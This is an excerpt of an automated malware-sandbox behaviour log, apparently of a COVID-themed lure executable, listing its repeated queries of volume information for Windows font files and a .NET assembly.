Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
